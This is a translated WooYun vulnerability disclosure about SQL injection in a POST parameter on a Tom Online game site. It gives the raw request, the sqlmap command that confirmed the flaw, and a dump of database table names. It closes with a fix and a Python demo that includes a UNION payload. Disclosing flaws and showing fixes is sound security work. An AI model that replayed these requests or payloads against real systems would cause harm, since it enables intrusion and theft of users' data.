Vulnerability summary

Vulnerability ID: wooyun-2015-0118977

Title: SQL injection on a Tom Online site exposes 400,000 users

Vendor: TOM在线 (TOM Online)

Author: 路人甲 (anonymous contributor)

Submitted: 2015-06-09 10:29

Fix time: 2015-06-14 10:30

Disclosed: 2015-06-14 10:30

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor was notified but ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-06-09: Details sent to the vendor; awaiting the vendor's response
2015-06-14: Vendor actively ignored the report; details published

Brief description:

The 400,000-user figure is Tom's own.

Detailed description:

[Image: 1.png]


POST /web/download_page.jsp?source=HP_mobilegame_bybsb&from=00403&class=and&q_id=99 HTTP/1.1
Host: pk.tom.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=abc1jamRVmxlb9eZvF82u
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 20

mobile_game_id=12777


sqlmap.py -r test.txt -p mobile_game_id --dbms mysql
The saved request above (test.txt) is fed to sqlmap, which confirms the injection in the POST body parameter mobile_game_id against the MySQL backend:

Database: newwapdb
[228 tables]
+---------------------------------------+
| back_download_game_info |
| bind_tom_139 |
| download_count |
| filter_words |
| game_bulletin |
| game_clientinfo |
| game_cogameinfo |
| game_coinfo |
| game_goods |
| game_goods_type |
| game_mission |
| game_netbattle |
| game_netbattle_item |
| game_photo |
| game_single_record |
| game_stat_day |
| game_toolsinfo |
| game_uids |
| game_user |
| game_user_black |
| game_user_chat |
| game_user_friend |
| game_user_level |
| game_user_sign |
| game_user_sns |
| game_user_task |
| game_user_visitor |
| game_useraddressinfo |
| game_usergold |
| game_usergolddetail |
| game_usergoods |
| game_userinfo |
| game_usermdoupmsg |
| game_userpay_offerclient |
| game_userpayrecord |
| game_userprize |
| game_userrandom |
| game_userrandom_bak |
| game_userrandom_new |
| game_userrechargerecord |
| game_v2_netbattle |
| game_v2_netbattle_finalgoldinfo |
| game_v3_bulletin |
| game_v3_friends |
| game_v3_linkmobile |
| game_v3_netbattle |
| game_v3_netbattle_finalgoldinfo |
| game_v3_netbattle_item |
| game_v3_pksparameter |
| game_v3_prizes |
| game_v3_sendsmsinfo |
| game_v3_single_record |
| game_v3_usergold |
| game_v3_usergolddetail |
| game_v3_userinfo |
| game_v3_userprize |
| game_v4_adv_record |
| game_v4_bulletin |
| game_v4_bulletin_wap |
| game_v4_cmddisc_history |
| game_v4_coupon_history |
| game_v4_couponprize_info |
| game_v4_fgrechargeprize_history |
| game_v4_finalgold_rechargeinfo |
| game_v4_friends |
| game_v4_gamedown_config |
| game_v4_gametype_info |
| game_v4_linkmobile |
| game_v4_lucklydraw_history |
| game_v4_manualprize |
| game_v4_manualprize_info |
| game_v4_message |
| game_v4_message_bak20120420 |
| game_v4_message_bak20120501 |
| game_v4_message_bak20120604 |
| game_v4_message_location |
| game_v4_message_location_bak20120420 |
| game_v4_message_location_bak20120501 |
| game_v4_message_location_bak20120604 |
| game_v4_message_location_new |
| game_v4_message_new |
| game_v4_mobileuid_linkinfo |
| game_v4_msgpush_info |
| game_v4_msgpush_type |
| game_v4_netbattle |
| game_v4_netbattle_bak20120420 |
| game_v4_netbattle_finalgoldinfo |
| game_v4_netbattle_item |
| game_v4_netbattle_item_bak20120420 |
| game_v4_onlinegame_info |
| game_v4_onlinegame_itempayment |
| game_v4_onlinegame_smscode |
| game_v4_payment_platform_detail |
| game_v4_pksparameter |
| game_v4_prizes |
| game_v4_robot_sendsmscount |
| game_v4_robotinfo |
| game_v4_sendsmsinfo |
| game_v4_single_record |
| game_v4_thirdpart_cardinfo |
| game_v4_thirdpart_partnerinfo |
| game_v4_thirdpart_usercard |
| game_v4_topboard |
| game_v4_user_freegold |
| game_v4_user_freegold_monthly |
| game_v4_user_freegolddetail |
| game_v4_user_prizeinfo |
| game_v4_userbattle_summarizinfo |
| game_v4_usercoupon_info |
| game_v4_usergold |
| game_v4_usergolddetail |
| game_v4_userinfo |
| game_v4_userinfo_extend |
| game_v4_userlogin |


All the tables you would expect are there: user accounts, payment and recharge records, logins.

Proof of vulnerability:

[Image: QQ图片20150606153011.png]

[Image: QQ图片20150605161728.png]

[Image: QQ图片20150608090704.png]

[Image: QQ图片20150608090759.png]

Fix:

Filter the input: treat mobile_game_id as an integer (reject anything that is not digits) and pass it to the query as a bound parameter instead of concatenating it into the SQL string.
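To make the fix concrete, here is an added example (not code from the report or from the Tom site) that puts the flawed pattern beside the hardened one. It assumes the endpoint builds its query by string concatenation, which is what a POST-body injection in mobile_game_id implies; sqlite3 stands in for the site's MySQL backend, the table names game_clientinfo and game_user are taken from the dump above, and their column layouts and the sample rows are constructed for the example.

```python
import re
import sqlite3

# Constructed sample data. The table names come from the dump above; the column
# layouts are assumptions, and sqlite3 stands in for the site's MySQL backend.
SAMPLE_GAMES = [(12777, "pk_game"), (12778, "other_game")]
SAMPLE_USERS = [(1, "alice", "alice@example.com"), (2, "bob", "bob@example.com")]

# A UNION payload of the kind sqlmap would try in the mobile_game_id POST field
# (constructed; '||' is SQLite string concatenation, MySQL would use CONCAT()).
UNION_PAYLOAD = "0 UNION ALL SELECT username || ':' || email FROM game_user"


def make_db():
    """Build an in-memory database with the two tables the example needs."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE game_clientinfo (mobile_game_id INTEGER, name TEXT)")
    conn.execute("CREATE TABLE game_user (id INTEGER, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO game_clientinfo VALUES (?, ?)", SAMPLE_GAMES)
    conn.executemany("INSERT INTO game_user VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, mobile_game_id):
    """The flawed pattern: the raw POST value is concatenated into the SQL text,
    so a payload in mobile_game_id rewrites the query (here, to read game_user)."""
    sql = "SELECT name FROM game_clientinfo WHERE mobile_game_id = " + mobile_game_id
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, mobile_game_id):
    """The fix: the value must be a plain integer, and it is passed to the driver as
    a bound parameter, so the SQL text never changes whatever the client sends."""
    if not re.fullmatch(r"[0-9]{1,10}", mobile_game_id):
        raise ValueError("mobile_game_id must be a positive integer")
    sql = "SELECT name FROM game_clientinfo WHERE mobile_game_id = ?"
    return [row[0] for row in conn.execute(sql, (int(mobile_game_id),))]


def safe_rejects(conn, value):
    """True if the hardened lookup refuses the value instead of executing it."""
    try:
        lookup_safe(conn, value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal id:  ", lookup_vulnerable(db, "12777"))
    print("vulnerable, payload:    ", lookup_vulnerable(db, UNION_PAYLOAD))
    print("safe, normal id:        ", lookup_safe(db, "12777"))
    print("safe, payload rejected: ", safe_rejects(db, UNION_PAYLOAD))
```

The integer check alone would already stop this particular payload, but binding the parameter is what makes the query safe regardless of how the validation evolves; in the JSP original the same two steps are Integer.parseInt on the request parameter and a PreparedStatement with a ? placeholder.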

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Vendor response

Vendor reply:

Severity: No impact, vendor ignored

Ignored at: 2015-06-14 10:30

Vendor comment:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None